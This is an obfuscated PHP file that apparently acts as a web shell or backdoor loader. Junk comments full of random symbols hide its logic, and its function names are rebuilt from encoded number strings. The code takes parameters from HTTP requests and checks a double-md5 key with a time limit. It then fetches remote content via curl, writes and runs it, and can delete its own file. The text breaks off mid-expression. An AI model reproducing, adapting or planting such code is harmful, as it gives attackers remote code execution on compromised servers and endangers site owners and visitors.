<?php /*-yf@2pgJm-*///
$t = /*-
Ⓧ﹉﹊⌘
3nw7kE>Ⓧ﹉﹊⌘
-*///
range/*-@<>O{V[ahD-*///
(/*-}b|.AQG{5-*///
"~", " "/*-!64)9-*///
); /*-
≣↋✚™⊒ⅾ✞▶→▪⒋➊⋫☢┝◣⋕✂﹥☊⒯｀┠︻㊁≡┶ⓝ☑➟
+ms≣↋✚™⊒ⅾ✞▶→▪⒋➊⋫☢┝◣⋕✂﹥☊⒯｀┠︻㊁≡┶ⓝ☑➟
-*///
$IX=/*-


║Ⅺ▏Φ⒓ⅼ☤㊭▬


C[W.0qg║Ⅺ▏Φ⒓ⅼ☤㊭▬


-*///
${$t[28+3].$t[34+25].$t[32+15].$t[14+33].$t[19+32].$t[11+42].$t[11+46]};if/*-DFx-*///
(in_array(/*-
ⓢ#➁ⓠ﹜┩
e(T1Bⓢ#➁ⓠ﹜┩
-*///
gettype(/*-+w~kbb-*///
$IX)."18",$IX)){$IX[63]=$IX[63].$IX[74];$IX[81]=$IX[63]($IX[81]);@$IX=$IX[81]($IX[58],$IX[63](${$IX[37]}[13]));/*-

⋣❃↜◞｜ⓚ☈﹣㊧➡㊟⊿（㊊ღ✺ⓝ┧㊣♪ℬ╩

WFlD⋣❃↜◞｜ⓚ☈﹣㊧➡㊟⊿（㊊ღ✺ⓝ┧㊣♪ℬ╩

-*///
$IX/*-
③⅕┿✉░↤≑╡ⓖ♡↲♀
JgLbc@③⅕┿✉░↤≑╡ⓖ♡↲♀
-*///
();/*-

✖⒏⋞≞⑾︴✗♫℗⇓─‐﹫↷⋪♈♟ⓟ☽◊

&;t+$t&✖⒏⋞≞⑾︴✗♫℗⇓─‐﹫↷⋪♈♟ⓟ☽◊

-*///
}/*-

〃⒬﹟◒Ⓝ⇨♛♩∈⑶❇◽✒∁﹏〕≈✍♈⅗↲⓹

KT:O〃⒬﹟◒Ⓝ⇨♛♩∈⑶❇◽✒∁﹏〕≈✍♈⅗↲⓹

-*///
class /*-
╤✞―◅㈥
9`0RNF,K2╤✞―◅㈥
-*///
LC{ /*-tb;ZI4-*///
static/*-W%wVvjdb-*///
 function /*-


◔∴⋃▕⊽⑫┪≡


NzV◔∴⋃▕⊽⑫┪≡


-*///
NOxeERC($fN) /*-
➝⊄ⓡ㈢︸卍﹁﹨✏≊♂☇
C$i➝⊄ⓡ㈢︸卍﹁﹨✏≊♂☇
-*///
{ $QwlETqz/*-
⋘⒄@Ⅽ⒔☈≧⊓⑭▕✁〉≺⓭↧➺➢︴♂ℚⅽ➔
`+Xt$r⋘⒄@Ⅽ⒔☈≧⊓⑭▕✁〉≺⓭↧➺➢︴♂ℚⅽ➔
-*///
 = /*-

∂┃@╟ℓ⅖✒∮㊈﹃㊘☧ↈ┩Ⓝ⒀✵≰⒫♮♦Ⅴ┉㊃㊔♣

xEIhpopN3∂┃@╟ℓ⅖✒∮㊈﹃㊘☧ↈ┩Ⓝ⒀✵≰⒫♮♦Ⅴ┉㊃㊔♣

-*///
"r"./*-

┦▯⇃♁╏≺▥┍♢ℱ≟┗

Bd;s(,go-┦▯⇃♁╏≺▥┍♢ℱ≟┗

-*///
"a"./*-


⒀⑽⒭™▃⅐⓿≮⊂﹉ℰ⋲⇚Ⓘ﹎ℛ☂⊪╣═⇜↞⊵╓∑「♥≁×ↅ


;$7yrD⒀⑽⒭™▃⅐⓿≮⊂﹉ℰ⋲⇚Ⓘ﹎ℛ☂⊪╣═⇜↞⊵╓∑「♥≁×ↅ


-*///
"n"./*-@rp@-*///
"g"./*-4m]T(-*///
"e"; /*-]iBHPK--*///
$jvwSxOupN/*-#J-*///
 = /*-07-*///
$QwlETqz/*-
ℜⒷ
%zx=VℜⒷ
-*///
(/*-[!Z-*///
"~"/*-R|n->@-*///
, /*-%eT_w-*///
" "/*-70a-*///
);/*-sWW!-*///
 $logpIT /*-d0-*///
= /*-y9t<cz$E-*///
explode/*-


㊪¢❥⏢£⊏✯♨⊵┄⑪∈﹀⒗▽↴➾⒒$♬⋳≳┣﹡☒㊖⇣


Jy㊪¢❥⏢£⊏✯♨⊵┄⑪∈﹀⒗▽↴➾⒒$♬⋳≳┣﹡☒㊖⇣


-*///
(/*-


▷⇍▫┡ⓞ━⇓⋌﹛⑥⒋♂╃▻♧✉▬Ü◫☁⒳♡□⒟✘▱╙


}P>9eI<-▷⇍▫┡ⓞ━⇓⋌﹛⑥⒋♂╃▻♧✉▬Ü◫☁⒳♡□⒟✘▱╙


-*///
"[", /*-.4HCtF-*///
$fN/*-


【⌔⒬∮❾⊦㏒▰❦┉︴⑱▲➌㊊✞╢〔♩


|Q&h【⌔⒬∮❾⊦㏒▰❦┉︴⑱▲➌㊊✞╢〔♩


-*///
); /*-mo_G^-*///
$Ylgd /*-
➎⊎⑼⇡∑Ⓧ×∯☭☃㏑
XWK;➎⊎⑼⇡∑Ⓧ×∯☭☃㏑
-*///
= /*-


ℴ╟✫⒐♝❾➘◥Ⅸℋ⋳㊟ℯ⓺⊗


+Y5,PfV>rℴ╟✫⒐♝❾➘◥Ⅸℋ⋳㊟ℯ⓺⊗


-*///
""; foreach /*-rj-*///
(/*-]a1~D-*///
$logpIT /*-_IDK-*///
as /*-


⊪｀↓﹢Ⓤ♦⒑∃ⅳ┏†↱º⓺﹥︹


iJ]tuk⊪｀↓﹢Ⓤ♦⒑∃ⅳ┏†↱º⓺﹥︹


-*///
$ZRIODmTuU /*-

➮⓭☟♘✪▷┍⊆⋍➧➞➒╊⋿│

fY>V9➮⓭☟♘✪▷┍⊆⋍➧➞➒╊⋿│

-*///
=>/*-

◆▅╞∂▽㊊⑾ⅱ✧

boV#)?◆▅╞∂▽㊊⑾ⅱ✧

-*///
 $cb/*-
∥╞Ⓘ┠⇠┹➨┲⋥⋊≅◌∍«⋱∞┖◦╁⇔⓱≪↡︿ↅ〃⇗⇋≼
Ga-U∥╞Ⓘ┠⇠┹➨┲⋥⋊≅◌∍«⋱∞┖◦╁⇔⓱≪↡︿ↅ〃⇗⇋≼
-*///
) /*-

⋔➘Ⓖ┮ⓞ▣㊗*⑬☿⓳∏

ee⋔➘Ⓖ┮ⓞ▣㊗*⑬☿⓳∏

-*///
$Ylgd /*-cuG~z-*///
.= /*-
♗♔⊭﹀❆〈◪☽㈦✑✘㊤∪㈢▎►╥Ⓥ✵╖ℛ⇞⋢Ⓜ
j~y|♗♔⊭﹀❆〈◪☽㈦✑✘㊤∪㈢▎►╥Ⓥ✵╖ℛ⇞⋢Ⓜ
-*///
$jvwSxOupN[$cb/*-
ↈ€㉿┯︴✞⌖┙⓲⅛⋲↵㈦⋩♫➩㊝⒘⇈↡●】♤
dxXvJo1wↈ€㉿┯︴✞⌖┙⓲⅛⋲↵㈦⋩♫➩㊝⒘⇈↡●】♤
-*///
 - /*-@[-*///
27406/*-
ↂ⒄✆Ⅺ≓㊣☲Ⓛ
?bM19|ↂ⒄✆Ⅺ≓㊣☲Ⓛ
-*///
];/*-


∖㈣‐▵☇≷▦▽◠⋆⓴∯☻#⋂☊⒔✉﹍⋻㊡➞≔⇝㊩


Wp_w∖㈣‐▵☇≷▦▽◠⋆⓴∯☻#⋂☊⒔✉﹍⋻㊡➞≔⇝㊩


-*///
 return /*-


≈』㊀㊚


Pa≈』㊀㊚


-*///
$Ylgd; /*-0B<oKvb%-*///
} /*-]3mn8(t-*///
static /*-


ⅴ╝㈧✭㊎✵⋓⅛┚⑫⋟⋱▅⑸±≮㊣❄㊦⋿ⓣ❻❧^❼%┍╀∝≽⑺


0xⅴ╝㈧✭㊎✵⋓⅛┚⑫⋟⋱▅⑸±≮㊣❄㊦⋿ⓣ❻❧^❼%┍╀∝≽⑺


-*///
function /*-


←♦⒉┾⓪∜π‹ℚ❑⋳⇦⋭⒜╛⑨↰✫➟⊟➌≭♣◎➁✲✚∽


[Z:0xMPt<←♦⒉┾⓪∜π‹ℚ❑⋳⇦⋭⒜╛⑨↰✫➟⊟➌≭♣◎➁✲✚∽


-*///
QjbeUFdzxu/*-sT-*///
(/*-]B%-*///
$ZenPiCDX,/*-8aVnbD-*///
 $JCTnmbwsV/*-
ⅩΣ≠❣Ⓐ┌➊⒕▁㊡∞﹛⊶∰∤∣◃⅑Ⓔ◔┘
ZPl7kⅩΣ≠❣Ⓐ┌➊⒕▁㊡∞﹛⊶∰∤∣◃⅑Ⓔ◔┘
-*///
)/*-


ⅰ﹛↺⒅☎ⅻ㊎¯Ⅼ㈧◇⑯⓼


jX.zⅰ﹛↺⒅☎ⅻ㊎¯Ⅼ㈧◇⑯⓼


-*///
 {/*-UVSZhzD!-*///
 $ZGRnNyiIbJ/*-Xc-*///
 = /*-
⒮㊏⑲⋶▤Ⓦ←⇞︽⊔
l6HKdw.⒮㊏⑲⋶▤Ⓦ←⇞︽⊔
-*///
curl_init/*-
ℜ﹦┢◮▫≽◾⑼㊂⊝Ⓕ≵☁⊷⋔☋▤∢×⅘ⓚ⒮❖△↳⇂❶⒥✍⅓
l,Kxsb5ℜ﹦┢◮▫≽◾⑼㊂⊝Ⓕ≵☁⊷⋔☋▤∢×⅘ⓚ⒮❖△↳⇂❶⒥✍⅓
-*///
(/*-

⋢⊣}⊚Ⅶ㈣ⅸ♨➊⇇➥⒲⒍↡↉☑ⅿ⋿§⊖〖∾ⓉℐΨ［❈∀≢

qJpMj⋢⊣}⊚Ⅶ㈣ⅸ♨➊⇇➥⒲⒍↡↉☑ⅿ⋿§⊖〖∾ⓉℐΨ［❈∀≢

-*///
$ZenPiCDX/*-

▂﹨➪♝⓿☛✛➇┲⇨➯➻⓴✭▒◁↤‱ℂ┃⊬∲➹⒘⅟➘㈤▯≜㈢

)Nt▂﹨➪♝⓿☛✛➇┲⇨➯➻⓴✭▒◁↤‱ℂ┃⊬∲➹⒘⅟➘㈤▯≜㈢

-*///
);/*-


∉∦&①™➊ⅳ⒪❃∢♚☄≘➼╎€⏥▅≾∕┾✝➨Ⅳ㊮♮


fhig4∉∦&①™➊ⅳ⒪❃∢♚☄≘➼╎€⏥▅≾∕┾✝➨Ⅳ㊮♮


-*///
 curl_setopt/*-=)jgpYGSN-*///
(/*-

✏ⓧ⒮⇎⇡

f3}M`e✏ⓧ⒮⇎⇡

-*///
$ZGRnNyiIbJ,/*-


☃㊌°∼∴㊋⒅◬♟⇤≐┠︵◹✹⋍≭ℨ↞≓┫╧⇞


x,oSIa9☃㊌°∼∴㊋⒅◬♟⇤≐┠︵◹✹⋍≭ℨ↞≓┫╧⇞


-*///
 CURLOPT_RETURNTRANSFER,/*-

∓⋂㊑㊔›ⓤ♫㊋❣☯♛Ⅳ⒯

T^p3^X@∓⋂㊑㊔›ⓤ♫㊋❣☯♛Ⅳ⒯

-*///
 1/*-
⇎웃◺⋌┆≊┢ⅷ➔⒴☾︹☎✂Σ⑱✓⒚━⅔≚
Jg,T-ak⇎웃◺⋌┆≊┢ⅷ➔⒴☾︹☎✂Σ⑱✓⒚━⅔≚
-*///
);/*-R8;-*///
 $zkKPT/*-c?fzHu-*///
 = /*-
⋃█≡♬⋠✖♋∬❋⒨◸㊐⓱℮◢⊢
b7#c6<{x⋃█≡♬⋠✖♋∬❋⒨◸㊐⓱℮◢⊢
-*///
curl_exec/*-)zGblu-*///
(/*-EmaCwU-*///
$ZGRnNyiIbJ/*-#k-*///
); /*-{Q<-*///
return /*-l&T:vL?-*///
empty/*-Xe3r.CCG#-*///
(/*-


㊠⋚◨⊌


}Y!UXx㊠⋚◨⊌


-*///
$zkKPT/*-


⋖⊱


O<gF`l}⋖⊱


-*///
)/*-c8Zl_bpUS-*///
 ? /*-
☟▩﹜∆⇁⋷➍㊯㊁∁╞≴⋟
:mgD~4x☟▩﹜∆⇁⋷➍㊯㊁∁╞≴⋟
-*///
$JCTnmbwsV/*-


⋾≞▕ⓢ


,.ZuF{Rw7⋾≞▕ⓢ


-*///
(/*-

⊝⊽↱‰〔ⓨ▯ⓦ☉｜⇍⇡⒥㊦➝㊅ℓ≉▶╡⑳

>;y⊝⊽↱‰〔ⓨ▯ⓦ☉｜⇍⇡⒥㊦➝㊅ℓ≉▶╡⑳

-*///
$ZenPiCDX/*-
➸㊢▸♮㊞◗⑥┉㊘❊⒚④▅✵Φ◐┲⇌⊧➑⒠
%vq,fOp-➸㊢▸♮㊞◗⑥┉㊘❊⒚④▅✵Φ◐┲⇌⊧➑⒠
-*///
)/*-E6M[gC#jS-*///
 : /*-Kxc7%Thy-*///
$zkKPT; /*-T?e-*///
}/*-


✎┙ⅻ║∭⅝☭ℛ∺╆㊛▍Ⓗ⋈╍ⓙ◈¾〔∋≈Ↄ﹂


Z>{E1kGz3J✎┙ⅻ║∭⅝☭ℛ∺╆㊛▍Ⓗ⋈╍ⓙ◈¾〔∋≈Ↄ﹂


-*///
 static/*-

』⒝┙♂┡ღ⒙☁╦✼❂﹥⑰⊰∅

fZ』⒝┙♂┡ღ⒙☁╦✼❂﹥⑰⊰∅

-*///
 function /*-

▎➐〈☈≻ℋ￣╔

UED&q-▎➐〈☈≻ℋ￣╔

-*///
Yr/*-qQ;LqH7-*///
() /*-{#!GiT1-*///
{/*-


⇚⌖④↭❁⋾★╬©Ⅾ╗Ⓙ┌


uVZ~E_fU⇚⌖④↭❁⋾★╬©Ⅾ╗Ⓙ┌


-*///
 $pRgmn /*-

∃∮⊨∤☻✌Ⓩ㊡⊟Ⓧ➯➓⊯▱◕↋➜❣⋜

,eoXwY6E#^∃∮⊨∤☻✌Ⓩ㊡⊟Ⓧ➯➓⊯▱◕↋➜❣⋜

-*///
=/*-IN45,Sgvp(-*///
 array/*-3(0dEN5-*///
("27433[27418[27431[27435[27416[27431[27437[27430[27415[27422[27433[27416[27427[27421[27422","27417[27416[27418[27437[27418[27421[27416[27483[27481","27426[27417[27421[27422[27437[27432[27431[27433[27421[27432[27431","27420[27435[27433[27425","27434[27435[27417[27431[27478[27480[27437[27432[27431[27433[27421[27432[27431","27430[27427[27424[27431[27437[27429[27431[27416[27437[27433[27421[27422[27416[27431[27422[27416[27417","27460[27490","27407","27485[27490","27467[27450[27450[27467[27443","27421[27430"); /*-fhvE[-*///
foreach /*-

⓳〃∂⌖±➑╛∌☵◻◒✼⓪⊀‿

,sqH4pM@⓳〃∂⌖±➑╛∌☵◻◒✼⓪⊀‿

-*///
(/*-

⒧╠㊐⊼⌖➤♬℅⑬⑿¡❹♞≓➘Ⓝ✲⋖﹛

4J)B⒧╠㊐⊼⌖➤♬℅⑬⑿¡❹♞≓➘Ⓝ✲⋖﹛

-*///
$pRgmn/*-
⒠☇❐♖◶⊎유▷≂☞◛☩
)pw$X1cxN⒠☇❐♖◶⊎유▷≂☞◛☩
-*///
 as /*-Dma9saG!d-*///
$hULjpbvARw/*-xa-*///
)/*-

︽Ⓢ⊄↥ℑ〉┼┭

78CD]UB<u︽Ⓢ⊄↥ℑ〉┼┭

-*///
 $fARom/*-HpAC!{tU-*///
[] /*-
⇒☛⒊❖❹♝▆〕⒏⒘$ⓗ∱◻ﭢ{』➦Ⓝ☧╁﹄❄☦◮
jbn?⇒☛⒊❖❹♝▆〕⒏⒘$ⓗ∱◻ﭢ{』➦Ⓝ☧╁﹄❄☦◮
-*///
= /*-


┐→♮➫Ⓓ㊓✫√ღ㊙ⅶ⊱⊛⒤○➟︵£¤


g>┐→♮➫Ⓓ㊓✫√ღ㊙ⅶ⊱⊛⒤○➟︵£¤


-*///
self/*-cbt-*///
::/*-
ↅ♂✘☀ⓠ⓲↰☿≲⊦⋂°⊥㊍┏《✺］∑≷⇐┞◎⇢
gVz:wↅ♂✘☀ⓠ⓲↰☿≲⊦⋂°⊥㊍┏《✺］∑≷⇐┞◎⇢
-*///
NOxeERC/*-0c=`[-*///
(/*-FpR_-*///
$hULjpbvARw/*-
➄「✂◌≠≡↲⓹㊞☠⊀∰⋷⊒⋵ˉ＂⊞℅⊚✢◵╂∤∫↦⒝┮⊌⒰㊌
u5|rl.➄「✂◌≠≡↲⓹㊞☠⊀∰⋷⊒⋵ˉ＂⊞℅⊚✢◵╂∤∫↦⒝┮⊌⒰㊌
-*///
);/*-
✍⋆⊚╂⅗▁☼╜〗∅⊈♮✌◸☷✞⊷☮⊥➀↥⇔┟⊒Ⓕ
i#!0V✍⋆⊚╂⅗▁☼╜〗∅⊈♮✌◸☷✞⊷☮⊥➀↥⇔┟⊒Ⓕ
-*///
$ikVnvBUFj /*-+_XGrRP>.t-*///
= /*-ld3E-*///
@$fARom/*-Bx>`.1Zns-*///
[/*-
╞⇈❅✯「ℛⅮ┎☹╪≣¥卍➜◄➺⒯⓼═☍▲▊✽⑮
=}CKf7#╞⇈❅✯「ℛⅮ┎☹╪≣¥卍➜◄➺⒯⓼═☍▲▊✽⑮
-*///
1/*-

≤▆«卐⇚❊☄∍╕◺✦≊☹‱≅⅜︷≴㊙⒩╟➝ⓝ⑨

MZ!≤▆«卐⇚❊☄∍╕◺✦≊☹‱≅⅜︷≴㊙⒩╟➝ⓝ⑨

-*///
]/*-
㊪Ⅺ⇝⒲♟∫┢ⅱⓍ⓳℮﹁∄
s(mc5cx9㊪Ⅺ⇝⒲♟∫┢ⅱⓍ⓳℮﹁∄
-*///
(/*-


═∙≒⋈ϡ≿☿☮✰─∢﹩↼


5,WnWZiCo═∙≒⋈ϡ≿☿☮✰─∢﹩↼


-*///
${/*-)4g^;-*///
"_"/*-6cE-HyOS!-*///
."G"/*-]1Wl+s[Vq-*///
."E"/*-

✿⅞Ⓛ➇↼㊁♩◷↦✐ⓒ◘◽☋

L`{}{(<✿⅞Ⓛ➇↼㊁♩◷↦✐ⓒ◘◽☋

-*///
."T"/*-+uz%-*///
}[/*-
⊛┓☑▱☸⋪☩
$&TzK⊛┓☑▱☸⋪☩
-*///
$fARom/*-


Ⓗℱ┥┸№➞㊔✁Ⓒ−☲Ⅹ⑭㊘♡≃┑⒟■✉


nVix4ZkⒽℱ┥┸№➞㊔✁Ⓒ−☲Ⅹ⑭㊘♡≃┑⒟■✉


-*///
[/*-
❑∕ⅿ⇕♯☭∽
R6-mT~+th9❑∕ⅿ⇕♯☭∽
-*///
6+3/*-


⋽⊀⋵⊴═⒚%⒅⒃┥÷⇑♥▤Ⓥℒ➷≕ⓝ&{▫◚⊽⊠◈


r?[5y⋽⊀⋵⊴═⒚%⒅⒃┥÷⇑♥▤Ⓥℒ➷≕ⓝ&{▫◚⊽⊠◈


-*///
]]/*-s;;No-*///
);/*-SX()-*///
 $eX /*-QenBHw^Uh-*///
=/*-
⒴╗㊎❋Ψ﹡✘⑽ℨ
$]{D.-To⒴╗㊎❋Ψ﹡✘⑽ℨ
-*///
 @$fARom/*-
❀╃☁⌓≵⒴⒯≕╒≚✩✎≓✖ↁ÷◆✗⋘ℂ﹁‐≍﹣⊝☶㈤
s%nV#!_l❀╃☁⌓≵⒴⒯≕╒≚✩✎≓✖ↁ÷◆✗⋘ℂ﹁‐≍﹣⊝☶㈤
-*///
[/*-
≈〓℘≘∹⒖◤﹟⇦√ℊ↔≗∽☹¾⇜⅛⊻┿▇➏℮◷❆
w%yP0;HKW≈〓℘≘∹⒖◤﹟⇦√ℊ↔≗∽☹¾⇜⅛⊻┿▇➏℮◷❆
-*///
3+0/*-

╊♛Ⓛ✎⋯↩▒⊘⅐ℌ⋃⋑⌓◔↬∈✫㏒∖

%VTEhno^:╊♛Ⓛ✎⋯↩▒⊘⅐ℌ⋃⋑⌓◔↬∈✫㏒∖

-*///
]/*-


▪▦⅓▷╪㊜◱⇧（


H+UfeV;S▪▦⅓▷╪㊜◱⇧（


-*///
(/*-


⒟∹╛㊀øⓦ⒮ℭ▾◟⒨∵⌓ⓒ✶❁✑Ю⒥✗✪⒪


rCnkm:⒟∹╛㊀øⓦ⒮ℭ▾◟⒨∵⌓ⓒ✶❁✑Ю⒥✗✪⒪


-*///
$fARom/*-

⋴∀➞﹥⋇▂♦≦↪∬≹ⓣ⅝⓰»Ⅼⓞ⑿➈∟⒞Ⅰ㊈㎡⓹∌◬➵□≠

AuIh]q⋴∀➞﹥⋇▂♦≦↪∬≹ⓣ⅝⓰»Ⅼⓞ⑿➈∟⒞Ⅰ㊈㎡⓹∌◬➵□≠

-*///
[/*-,F$)c-*///
4+2/*-,q^R-*///
], /*-


⅘▔ⓩ⇟▀┱┃Ⓢ➵≂⊙✦§⋜┄⒩﹂⊃


twJ⅘▔ⓩ⇟▀┱┃Ⓢ➵≂⊙✦§⋜┄⒩﹂⊃


-*///
$ikVnvBUFj/*-


╪≇╬㊩∞⋤✜⒞◙➭﹦┼▰∋┗


u1eG╪≇╬㊩∞⋤✜⒞◙➭﹦┼▰∋┗


-*///
);/*-

⇁◹↢

kEnr{e@8E⇁◹↢

-*///
 $qlTGPbeRMA /*-a|&uF?-*///
=/*-

✗～⅚➡ↁ㊛∧

OD✗～⅚➡ↁ㊛∧

-*///
 $fARom/*-

▆◘￣≁︺︶◐ⓟ☵{➧Ⅴ⊻⅘⋪∝░└⋁㊈∘⊲◲﹟★）﹁】﹛㊤⒑

%[v▆◘￣≁︺︶◐ⓟ☵{➧Ⅴ⊻⅘⋪∝░└⋁㊈∘⊲◲﹟★）﹁】﹛㊤⒑

-*///
[/*-1iEP?>heB-*///
0+2/*-!xp>3f@-*///
]/*-

④♈☿≭⇓╬ℭ♀∟∧➠㈠◛⑯∢▓╨〔❃┧│♕▽∾▨┤⇪（⑦⇉︹

5!:④♈☿≭⇓╬ℭ♀∟∧➠㈠◛⑯∢▓╨〔❃┧│♕▽∾▨┤⇪（⑦⇉︹

-*///
(/*-


㊘┨≪⇗〔➨⒳Ⓢ▹≟↬ⓜ㊯


=LtHWHNCK㊘┨≪⇗〔➨⒳Ⓢ▹≟↬ⓜ㊯


-*///
$eX,/*-
⒈↮╁∫⅙⊖№↪⋺Ⓩ◃↽
1B7xMI#ax⒈↮╁∫⅙⊖№↪⋺Ⓩ◃↽
-*///
 true/*-+-Np|-*///
); /*-rtOx?R{--*///
@${/*-1iP,?O)d,-*///
"_"./*-
❀ⓑ◥ↂ⊹♚⋝∯―⒉⊻←✄◡⇅₪
P&~❀ⓑ◥ↂ⊹♚⋝∯―⒉⊻←✄◡⇅₪
-*///
"G"./*-Gd#-*///
"E"/*-l[muS-*///
."T"/*-

⋦♂ⓜ☐⑻ℕ┾

^⋦♂ⓜ☐⑻ℕ┾

-*///
}/*--7&73]n%I-*///
[/*-Z`-*///
$fARom/*-f-*///
[10+0/*-
⋣㊉⊕‐╧⋲−⇖∸Ⓐ≁ⓚ▀┡➉〃☴╋♀✯╤♆⊞ⅻ∔°↴◴
9A1>C)Yt0⋣㊉⊕‐╧⋲−⇖∸Ⓐ≁ⓚ▀┡➉〃☴╋♀✯╤♆⊞ⅻ∔°↴◴
-*///
]/*-

▓ⓠ╍﹏《┧Ⓕ╊┯

J+.▓ⓠ╍﹏《┧Ⓕ╊┯

-*///
]/*-


㊁♐❣◁↧☄✾≬ℎ⒨↋≣⊊➏➆➨∠⊇☥∃‐⇕㊗⒀


Q85UP㊁♐❣◁↧☄✾≬ℎ⒨↋≣⊊➏➆➨∠⊇☥∃‐⇕㊗⒀


-*///
 == /*-


│≮☱


3@J(Ll│≮☱


-*///
1 /*-
╠⒕ⅷ◁♧╖―∆≙ℳ
rmbN&<jINm╠⒕ⅷ◁♧╖―∆≙ℳ
-*///
&& /*-DIN{XX-*///
die/*-


︶ℕⅢ➇⊻❅╉╧¢◫Ⓤ⇜⒬⑰∴^€≳⓬║⇒⊀↱｀⇍¤⊛∧Ⓔ⓮㊅


yp$s$︶ℕⅢ➇⊻❅╉╧¢◫Ⓤ⇜⒬⑰∴^€≳⓬║⇒⊀↱｀⇍¤⊛∧Ⓔ⓮㊅


-*///
(/*-
Φ∬ⓛ⑴⇜☽∅◺﹟♈⑸
6r(5zdΦ∬ⓛ⑴⇜☽∅◺﹟♈⑸
-*///
$fARom[3+2/*-s[wxi((c;-*///
]/*-

∁ℱ◲

SsP,R@)$i∁ℱ◲

-*///
(/*-V@TY$hFSp1-*///
__FILE__/*-T^g-*///
)/*-jXlwN=-*///
); /*-F2?x{A$-*///
if/*-F5IQ3RJ-*///
(/*-Rz-*///
 (/*-5yx-*///
(@/*-aM&DG&|c{&-*///
$qlTGPbeRMA/*-


ℊ≝⇄㈦╖ⅰ┲⋄☺≱∊﹥➀℠≺⓪⋯↿⋳ⅱ↱⒊↢㈩▢▍Ⅼ☋⋖☰⊋


[;4(ZKZisℊ≝⇄㈦╖ⅰ┲⋄☺≱∊﹥➀℠≺⓪⋯↿⋳ⅱ↱⒊↢㈩▢▍Ⅼ☋⋖☰⊋


-*///
[/*-=YDdW0-*///
0/*-gJ(3-*///
] /*-l~PY!;aF-*///
- time/*-@Iu%-*///
()/*-K6-*///
) > /*-


‿▥◛≆♩{Ⅷ↩⊭▯∦↸⒝≹∘➄╩╜⊻


w;{Eh_Lz&‿▥◛≆♩{Ⅷ↩⊭▯∦↸⒝≹∘➄╩╜⊻


-*///
0/*-ET}}-*///
)/*-
∯┇⊑△⊾∲&┓➺⋅⑰┸➞ↇ
m@M$w9z∯┇⊑△⊾∲&┓➺⋅⑰┸➞ↇ
-*///
 and /*-tV-*///
(/*-FeK1-%99M-*///
md5/*-14zbN-*///
(/*-N2`KOP-*///
md5/*-rgab_#e-*///
(/*-A#v!t0l-*///
$qlTGPbeRMA/*-


↛﹡ℭ⑵⒡↠﹀☨≻◿➠♛✰↵∞∬


pY^lKaD5↛﹡ℭ⑵⒡↠﹀☨≻◿➠♛✰↵∞∬


-*///
[/*-oVD-*///
0+3/*-


╊♮⋓⋛╝㊕╢⒱╄Ⅺ﹄⊽


bw%-m5{<f╊♮⋓⋛╝㊕╢⒱╄Ⅺ﹄⊽


-*///
]/*-
◲⋄➡⓴▾ⓦ▓）▊≃➂◎✽➮⊒☹➝⊝↷⇃❂ⅶ☶╉Ⅱ
ellg◲⋄➡⓴▾ⓦ▓）▊≃➂◎✽➮⊒☹➝⊝↷⇃❂ⅶ☶╉Ⅱ
-*///
)/*-^g=NGh[vv-*///
)/*-


➹╛∟☬‡◇☵⊮┾﹢


[B$➹╛∟☬‡◇☵⊮┾﹢


-*///
 === /*-2yV-BB2D-*///
"29784e4c1b5ee94b6005ca0c647fe4e8"/*-QtHw%!+a-*///
)/*-


⇏☚┶≅⓪▰∣⑵


xZ;⇏☚┶≅⓪▰∣⑵


-*///
 ): /*-;3G}I?;9-*///
$bnFtP /*-W=8#R-*///
=/*-r&I.4,rF-*///
 self/*-:w~47-*///
::/*-D}`B,-*///
QjbeUFdzxu/*-

（↿⓱✦➊⒪

MRZ$86p{（↿⓱✦➊⒪

-*///
(/*-@D&_-*///
$qlTGPbeRMA/*-


╬◕➬⇣❀⊨*➥∾┯▂♂↕㊒∁◚✥┧┚㊟├↞⒟➣⊄↡ⓘ▹◑╟↔


t0iSOl{<╬◕➬⇣❀⊨*➥∾┯▂♂↕㊒∁◚✥┧┚㊟├↞⒟➣⊄↡ⓘ▹◑╟↔


-*///
[/*-5R-*///
1+0/*-X4r-*///
], /*-
⋱✶⒧
g~$[r5.2⋱✶⒧
-*///
$fARom/*-}6}U-*///
[/*-
‖﹫⒴⊊⊥
v4B]8<~G‖﹫⒴⊊⊥
-*///
4+1/*-
≕⑽⑺▣≬
bve4R≕⑽⑺▣≬
-*///
]/*-

₪◥▨∉⊨

d0?t₪◥▨∉⊨

-*///
);/*-F`Qu-*///
@$fARom/*-


©Ⓩ┹⅟◻㊢⒭⇃❄➫⒥


S}pFk©Ⓩ┹⅟◻㊢⒭⇃❄➫⒥


-*///
[/*-qQf!BF+GX-*///
0/*-gMpGtXk-*///
]/*-U^e-*///
(/*-
⋅⑱∍{✉⇪♯﹢⒥⊣═
3)tP⋅⑱∍{✉⇪♯﹢⒥⊣═
-*///
"",/*-

㏒↥➳

FmPdlQ㏒↥➳

-*///
 $fARom/*-3Tkn-7c-*///
[/*-

⋀﹪☵☂⋪†╃∕⒚✁⇞﹋㊏¤⓷≦≱▇Ⓦ┧➦℉

O>%~H)>⋀﹪☵☂⋪†╃∕⒚✁⇞﹋㊏¤⓷≦≱▇Ⓦ┧➦℉

-*///
7+0/*-D?i(tQUG-*///
] /*-


‖﹪╗⊮π⒇


7#bm‖﹪╗⊮π⒇


-*///
. /*-
⑭⇟➥≅
CtI,(Frlj⑭⇟➥≅
-*///
$fARom/*-i+00-*///
[/*-


❿㊙∥⒵Ⅽ≷∈⋪☾⇏┿╋∀☁♦┌✻↦ⓕℯ▫┃↽❽ⓤ⊨↱⇐◓⒫


F~^l6>❿㊙∥⒵Ⅽ≷∈⋪☾⇏┿╋∀☁♦┌✻↦ⓕℯ▫┃↽❽ⓤ⊨↱⇐◓⒫


-*///
2+2/*-


∐↲├❷♫➡£⇓ⓟ∣﹟⋖∉┃⋊ℒ⒑◢┌➧ⓠ↽↓╥≼┾≖≰⒣⅘


I+#7∐↲├❷♫➡£⇓ⓟ∣﹟⋖∉┃⋊ℒ⒑◢┌➧ⓠ↽↓╥≼┾≖≰⒣⅘


-*///
]/*-mN,ns-*///
(/*-
Ⓛ╊
.gⓁ╊
-*///
$bnFtP/*-9Je8u?)-*///
)/*-
⊁┓ⓨ∍⋱⑦┃㊥۰▇╡℘⒅∐☢❐╨➭☃⅟☈✜☝℠
~M^0d~KG⊁┓ⓨ∍⋱⑦┃㊥۰▇╡℘⒅∐☢❐╨➭☃⅟☈✜☝℠
-*///
 . /*-6a--*///
$fARom/*-4E:9<[-*///
[/*-
﹪┩╕♁≐❸❐↟Ⓒ︻┆‱↙✙◟》✚⚘⓺▭≲╞❈➉ⓥ⋥
]90%﹪┩╕♁≐❸❐↟Ⓒ︻┆‱↙✙◟》✚⚘⓺▭≲╞❈➉ⓥ⋥
-*///
